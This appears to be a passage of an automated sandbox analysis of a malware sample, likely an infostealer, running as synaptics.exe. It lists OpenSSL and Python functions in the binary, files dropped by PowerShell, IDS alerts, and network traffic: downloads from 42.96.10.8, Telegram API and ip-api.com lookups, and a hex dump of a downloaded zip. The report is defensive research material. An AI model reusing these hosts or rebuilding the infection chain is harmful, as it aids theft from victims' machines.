                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8411AE EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,CRYPTO_memcmp,27_2_6F8411AE
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F861490 CRYPTO_malloc,ERR_put_error,CRYPTO_free,27_2_6F861490
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8674A0 CRYPTO_malloc,CRYPTO_clear_free,27_2_6F8674A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86F4A0 CRYPTO_free,27_2_6F86F4A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84163B SSL_in_init,SSL_is_init_finished,CRYPTO_free,SSL_get_rbio,BIO_clear_flags,BIO_set_flags,SSL_is_init_finished,BIO_snprintf,ERR_add_error_data,SSL_CTX_remove_session,SSL_in_init,memmove,27_2_6F84163B
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8914C0 EVP_PKEY_CTX_new,EVP_PKEY_decrypt_init,X509_get0_pubkey,EVP_PKEY_derive_set_peer,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,EVP_PKEY_decrypt,EVP_PKEY_CTX_ctrl,EVP_PKEY_CTX_free,ASN1_item_free,27_2_6F8914C0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8594D0 CRYPTO_get_ex_new_index,27_2_6F8594D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86F4F0 SSL_get_options,CRYPTO_free,CRYPTO_strdup,SSL_get_options,SSL_get_session,CRYPTO_free,27_2_6F86F4F0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8633A0 CRYPTO_get_ex_data,27_2_6F8633A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8653D0 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,27_2_6F8653D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86D3F0 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,SSL_has_matching_session_id,27_2_6F86D3F0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841032 CRYPTO_THREAD_run_once,OPENSSL_sk_find,OPENSSL_sk_value,EVP_enc_null,EVP_CIPHER_flags,EVP_get_cipherbyname,EVP_get_cipherbyname,EVP_get_cipherbyname,EVP_get_cipherbyname,EVP_get_cipherbyname,27_2_6F841032
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F847370 CRYPTO_free,27_2_6F847370
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F855370 CRYPTO_zalloc,SSL_SRP_CTX_init,27_2_6F855370
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86D2A0 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,SSL_SESSION_free,27_2_6F86D2A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8492B0 CRYPTO_free,27_2_6F8492B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841230 EVP_MD_size,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,EVP_DigestInit_ex,BIO_ctrl,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key,EVP_DigestSignInit,EVP_DigestUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free,27_2_6F841230
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F88B2F0 CRYPTO_memcmp,27_2_6F88B2F0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F859210 OPENSSL_sk_num,X509_STORE_CTX_new,ERR_put_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_put_error,X509_STORE_CTX_free,X509_STORE_CTX_get0_param,SSL_get_security_level,X509_VERIFY_PARAM_set_auth_level,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OPENSSL_sk_pop_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_put_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free,27_2_6F859210
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F877230 CRYPTO_free,CRYPTO_memdup,27_2_6F877230
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F865250 CRYPTO_set_ex_data,27_2_6F865250
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F87D270 CRYPTO_free,CRYPTO_strndup,27_2_6F87D270
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F869190 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,27_2_6F869190
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84156E CRYPTO_free,CRYPTO_memdup,27_2_6F84156E
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841730 CRYPTO_free,CRYPTO_malloc,memmove,27_2_6F841730
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84230B memchr,CRYPTO_free,CRYPTO_strndup,27_2_6F84230B
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84173F memmove,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,SSL_CTX_add_session,27_2_6F84173F
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F87D000 CRYPTO_free,CRYPTO_memdup,27_2_6F87D000
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84234C EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key,EVP_sha256,EVP_DigestSignInit,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,_time64,EVP_MD_CTX_free,EVP_PKEY_free,EVP_MD_CTX_free,EVP_PKEY_free,27_2_6F84234C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F857040 CRYPTO_free,CRYPTO_strndup,27_2_6F857040
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85F070 CRYPTO_free,CRYPTO_memdup,27_2_6F85F070
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F861070 ERR_put_error,SSL_SESSION_free,SSL_SESSION_free,CRYPTO_free,ERR_put_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,27_2_6F861070
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8D23D0 _PyArg_UnpackKeywords,PyObject_IsTrue,PyList_New,SSL_CTX_get_cert_store,X509_STORE_get0_objects,OPENSSL_sk_num,OPENSSL_sk_value,X509_OBJECT_get_type,X509_OBJECT_get0_X509,X509_check_ca,i2d_X509,PyBytes_FromStringAndSize,CRYPTO_free,PyList_Append,_Py_Dealloc,OPENSSL_sk_num,ERR_peek_last_error,ERR_clear_error,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,27_2_6F8D23D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8D4280 X509_NAME_entry_count,PyList_New,PyList_New,PyList_New,_Py_Dealloc,X509_NAME_get_entry,X509_NAME_ENTRY_set,PyList_AsTuple,_Py_Dealloc,PyList_Append,_Py_Dealloc,PyList_New,X509_NAME_ENTRY_set,X509_NAME_ENTRY_get_object,X509_NAME_ENTRY_get_data,ASN1_STRING_type,ASN1_STRING_length,ASN1_STRING_get0_data,_Py_BuildValue_SizeT,ASN1_STRING_to_UTF8,_Py_BuildValue_SizeT,CRYPTO_free,PyList_Append,_Py_Dealloc,PyList_AsTuple,_Py_Dealloc,PyList_Append,_Py_Dealloc,_Py_Dealloc,ERR_peek_last_error,ERR_clear_error,_Py_Dealloc,ERR_peek_last_error,ERR_clear_error,_Py_Dealloc,_Py_Dealloc,PyList_AsTuple,_Py_Dealloc,27_2_6F8D4280
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8D54C0 i2d_X509,ERR_peek_last_error,ERR_clear_error,PyBytes_FromStringAndSize,CRYPTO_free,27_2_6F8D54C0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_73AF2190 _Py_NoneStruct,_PyArg_UnpackKeywords,PyObject_GetBuffer,PyBuffer_IsContiguous,_PyArg_BadArgument,PyObject_GetBuffer,PyBuffer_IsContiguous,_PyArg_BadArgument,_PyArg_BadArgument,_PyArg_BadArgument,_PyArg_BadArgument,PyLong_AsLong,PyErr_Occurred,PyLong_AsLong,PyErr_Occurred,PyErr_Occurred,PyErr_Occurred,PyExc_TypeError,PyLong_AsUnsignedLong,PyLong_AsUnsignedLong,PyErr_Occurred,PyExc_TypeError,PyLong_AsUnsignedLong,PyErr_Occurred,PyExc_TypeError,PyLong_AsUnsignedLong,PyErr_Occurred,PyExc_TypeError,EVP_PBE_scrypt,PyExc_ValueError,PyExc_ValueError,PyBytes_FromStringAndSize,PyEval_SaveThread,EVP_PBE_scrypt,PyEval_RestoreThread,_Py_Dealloc,PyExc_ValueError,PyExc_ValueError,PyExc_ValueError,PyExc_ValueError,PyErr_Format,PyExc_ValueError,PyExc_ValueError,PyErr_SetString,PyBuffer_Release,PyBuffer_Release,PyBuffer_Release,27_2_73AF2190
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_73AF38F0 CRYPTO_memcmp,27_2_73AF38F0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\idlelib\Icons\README.txt
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\idlelib\idle_test\README.txt
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\idlelib\README.txt
                Source: Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: synaptics.exe
                Source: chrome.exeMemory has grown: Private usage: 1MB later: 26MB

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 42.96.10.8:80 -> 192.168.2.4:49733
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /envxfix.zip HTTP/1.1Host: 42.96.10.8Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                Source: Joe Sandbox ViewASN Name: LILLY-ASUS LILLY-ASUS
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49742
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49736
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F912EC0 recv,27_2_6F912EC0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Nov 2024 12:25:15 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Fri, 01 Nov 2024 14:08:46 GMTETag: "249c38d-625da7934817e"Accept-Ranges: bytesContent-Length: 38388621Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/zipData Raw: 50 4b 03 04 0a 00 00 00 00 00 84 56 57 59 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 44 4c 4c 73 2f 50 4b 03 04 14 00 00 00 08 00 f8 05 85 56 c9 4a 5c 2a 0c f7 0d 00 18 bb 22 00 16 00 00 00 44 4c 4c 73 2f 6c 69 62 63 72 79 70 74 6f 2d 31 5f 31 2e 64 6c 6c ec bd 07 58 54 49 b4 ef db 28 2a 0a d2 ad a2 a2 a2 a2 62 ce b6 39 62 40 50 51 18 f3 98 73 ce 62 4e 83 88 82 2d e6 30 86 d1 31 67 1d c7 ec 98 30 67 31 e7 9c c0 9c b3 72 ff bf 6e 30 cc 38 e7 dc 77 ce 79 ef 7b ef be de df 67 53 7b 57 d5 aa 55 ab aa 56 ad 54 65 cd 46 e3 0d 09 0d 06 83 a3 fe c5 c6 1a 0c 9b 0c b6 c7 db f0 9f 3f 6f f5 cf 35 f3 16 57 c3 ba a4 47 b3 6c 72 f0 3f 9a a5 6e 87 8e bd 3d 7b f4 ea de be 57 cb ae 9e ad 5b 76 eb d6 3d c8 b3 55 5b cf 5e 7d ba 79 76 ec e6 59 25 a0 8e 67 d7 ee 6d da 16 48 9e 3c 99 57 1c 8c 8d 63 33 94 7c f1 a4 4f e7 f8 7f ef a7 dd ed 7c 4f 7f b7 4e 0a ea f4 cc fa b7 47 a7 b7 d6 bf 3d 3b bd b3 fe ed 6b fd fb e2 49 50 e7 ee fa bb 69 5a 90 35 bf 88 f2 7b 3f e2 6f 9f 4e cf ad ef a3 3b db fe f6 b3 be d7 ee d8 ba 03 f0 e3 71 0f f4 31 18 fc 1d 92 18 42 53 dc 69 1d ff ed ba 21 41 16 67 07 d7 ac 86 5c ee 06 c3 82 64 d6 6f 4e ed f5 63 82 20 ee 06 6b 8a 74 02 83 21 b1 35 f7 eb 5f 83 29 9b 95 88 25 df 67 55 b6 b7 83 b5 92 c9 60 f8 fa d7 f6 a7 45 82 cc 86 34 1d 12 18 c6 9f c9 62 a8 eb c0 d7 ac 86 c1 89 0d 5f 9f 31 59 0d ee 05 29 9c d5 50 f4 a2 c1 10 76 3b 93 a1 a4 e1 df 9f df 6f 65 fa 7e ac a2 b2 18 c6 27 fa f7 f2 05 82 da f6 0f d2 df 97 39 dc 6d 08 d1 57 c7 ef cb 78 0a cd 02 bd da b4 0c 6a 69 30 f4 cd 93 d4 d6 f7 7c fa 9b cf fd db 62 b4 eb 5d c0 56 cc 50 f7 67 fd f4 c8 62 30 a4 d1 df 86 59 fe 5e 6e 67 81 8e b6 82 6b dc 6d 38 1a d2 eb 6f b7 7f 94 f3 2e 50 a8 50 eb 76 a2 b9 2b b4 79 9a c5 4a 6b 43 d8 0f ca f5 ea dd 8b 81 b3 d1 2e ab 06 4a 7f 46 ff a8 5c db 2e dd 55 d0 e3 ad 8d a6 86 f7 fa 3b f1 1f e5 2a 19 fe 7f fa 1c e1 89 29 7e d6 cd 10 13 7c 2b b5 21 c6 3f 65 62 43 4c 83 13 4a cd 8b d6 b7 ae d9 d3 18 62 a2 b3 ba 1a 62 5a 5f 4a 64 88 59 55 5c df 36 cf 4d 69 88 f1 da a5 d4 b8 c0 14 86 98 4e 63 13 18 62 12 95 49 68 88 31 24 56 dd c3 46 bd ee ab ad 6a 27 b6 18 0d 31 47 32 a8 6e ce 65 c9 05 af a5 52 47 cf 29 a3 64 b8 7e e6 ef 4f 65 88 69 b6 52 85 0f fe e5 6c 88 59 f0 40 75 8d 39 55 23 7d 1f 35 ee 93 51 df 7e 4f a3 6a cb 3d 54 a4 ea 5e d5 fd 69 be 5e 67 bd 57 bb 0d c6 e9 5b a5 0e aa 31 c4 51 3f b9 da 2b 23 e4 17 01 ad d5 c4 49 f8 2d 56 6a 41 29 a5 e6 50 ae 7a 7d 15 39 53 56 d5 ae 37 d5 b7 41 bf 08 fc dd 1e 42 3c 72 42 32 43 cc 43 5f a1 b1 31 b7 a3 21 26 65 51 75 a1 5c 47 07 43 8c df 26 7d 4b 15 a4 9f d9 61 89 0c 31 03 a6 ab dc e9 50 bd ba 4c 48 6b 88 19 78 20 a9 21 66 ca 3c 61 da a3 a5 0a ff 95 41 98 be 76 d4 eb 4f e7 d4 c6 e5 5a 82 ec 3b 51 6d f4 f2 d
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /envxfix.zip HTTP/1.1Host: 42.96.10.8Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /VOINE_BU HTTP/1.1Accept-Encoding: identityHost: 42.96.10.8User-Agent: Python-urllib/3.10Connection: close
                Source: global trafficHTTP traffic detected: GET /VOINE_BU HTTP/1.1Accept-Encoding: identityHost: 42.96.10.8User-Agent: Python-urllib/3.10Connection: close
                Source: global trafficHTTP traffic detected: GET /VOINE_BU HTTP/1.1Accept-Encoding: identityHost: 42.96.10.8User-Agent: Python-urllib/3.10Connection: close
                Source: global trafficHTTP traffic detected: GET /json/?fields=8195 HTTP/1.1Host: ip-api.comUser-Agent: python-requests/2.32.3Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /SCAN_900 HTTP/1.1Accept-Encoding: identityHost: 42.96.10.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3Connection: close
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global trafficDNS traffic detected: DNS query: apis.google.com
                Source: global trafficDNS traffic detected: DNS query: play.google.com
                Source: synaptics.exe, 00000014.00000003.2743673267.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2740898219.0000000001A63000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2742396700.00000000019A1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2737936143.0000000001535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
                Source: synaptics.exe, 00000014.00000003.2546396130.0000000000B99000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2548543308.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/
                Source: synaptics.exe, 00000014.00000003.2625802641.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627821618.00000000016CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue16298)
                Source: synaptics.exe, 00000014.00000003.2491091392.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2494776708.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2491869638.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2494231555.0000000000AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue19619
                Source: synaptics.exe, 00000014.00000003.2621884568.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627821618.00000000016BC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2616802597.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621521060.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue28539
                Source: synaptics.exe, 00000014.00000003.2495528030.0000000000AF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue5845#msg198636
                Source: synaptics.exe, 00000014.00000003.2631606979.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2601056030.000000000192A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2647268662.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627071554.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2609858470.0000000001936000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2666415324.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2723906148.0000000001936000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2663690600.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2599185163.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2676220591.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2618104210.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2658366203.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2623557464.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2652761780.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2634063079.0000000001931000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2639516326.000000000190F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue874900
                Source: synaptics.exe, 00000014.00000003.2512844280.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2514719540.0000000000C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/259174/
                Source: synaptics.exe, 00000014.00000003.2675863176.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2689040173.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2672783950.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2678476168.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2674661778.0000000001949000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2703833361.0000000001968000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2723906148.0000000001968000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2673059885.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2687512306.0000000001968000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2682178089.0000000001968000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2671110279.0000000001968000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2742396700.0000000001968000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684561105.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
                Source: synaptics.exe, 00000014.00000003.2622193539.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577573-compare-algorithms-for-heapqsmallest
                Source: synaptics.exe, 00000014.00000003.2705504110.000000000198D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2712422973.0000000001544000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2717288570.00000000019BA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2713378866.0000000001A5D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2742061088.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2703493115.00000000015E7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2706037061.0000000001544000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2713378866.0000000001A66000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2710404089.000000000198D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2711655946.000000000196D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2711655946.000000000198D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                Source: synaptics.exe, 00000014.00000003.2749100998.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://domain.tld/path/to/resource
                Source: synaptics.exe, 00000014.00000003.2522185220.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521705693.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2523194707.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2522322435.0000000000ADD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://foo.com/
